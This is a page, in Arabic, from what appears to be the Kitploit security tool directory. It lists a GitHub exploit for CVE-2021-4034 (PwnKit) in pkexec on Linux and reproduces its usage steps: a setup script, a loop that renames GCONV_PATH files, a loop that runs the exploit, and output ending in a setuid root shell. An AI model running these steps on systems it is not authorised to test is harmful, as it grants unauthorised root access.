Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-4034 — استغلال لثغرة CVE-2021-4034 (PwnKit) يستفيد من حالة سباق في pkexec لرفع الصلاحيات إلى الجذر على أنظمة لينكس. | Kitploit
أدوات/GitHubGitHub/ayrx/cve-2021-4034
تصعيد الامتيازاتأطر الاستغلالالاستغلالتطوير الحمولاتاستغلال الملفات الثنائية
GitHubayrx/cve-2021-4034

CVE-2021-4034

استغلال لثغرة CVE-2021-4034 (PwnKit) يستفيد من حالة سباق في pkexec لرفع الصلاحيات إلى الجذر على أنظمة لينكس.

عرض المستودع
9114منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-4034

استغلال لـ ثغرة pwnkit من فريق Qualys.

يفترض هذا الاستغلال وجود gcc على الجهاز المستهدف.

root@kitploit:~
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh

قم بتشغيل الأمر التالي في جلسة bash واحدة:

root@kitploit:~
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done

قم بتشغيل الأمر التالي في جلسة bash أخرى:

root@kitploit:~
while :; do ./exploit; done

ستفوز في النهاية بالسباق وتحصل على ملف ثنائي shell يمنحك صلاحيات الجذر:

root@kitploit:~
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)

يمكنك العثور على شرح موجز للتقنية في مدونتي.

تنزيل الأداة